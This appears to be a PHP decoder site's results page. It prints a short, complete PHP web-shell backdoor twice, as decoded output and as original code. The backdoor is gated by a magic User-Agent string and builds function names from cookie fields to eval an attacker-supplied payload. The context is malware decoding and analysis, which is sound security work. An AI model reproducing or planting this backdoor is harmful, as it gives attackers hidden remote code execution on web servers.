Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(isset($_SERVER['HTTP_USER_AGENT'])) { if(strpos($_SERVER['HTTP_USER_AGENT']..
Decoded Output download
<?php
if(isset($_SERVER['HTTP_USER_AGENT'])) {
if(strpos($_SERVER['HTTP_USER_AGENT'], '16589907') !== false) {
function clnt() {
$b = $_COOKIE;
($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;
return 0;
}
clnt();
}
} ?>
Did this file decode correctly?
Original Code
<?php
if(isset($_SERVER['HTTP_USER_AGENT'])) {
if(strpos($_SERVER['HTTP_USER_AGENT'], '16589907') !== false) {
function clnt() {
$b = $_COOKIE;
($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;
return 0;
}
clnt();
}
}
Function Calls
clnt | 1 |
strpos | 1 |
Stats
MD5 | d8022b4c8472e8ee92a7973fde3c47c4 |
Eval Count | 0 |
Decode Time | 320 ms |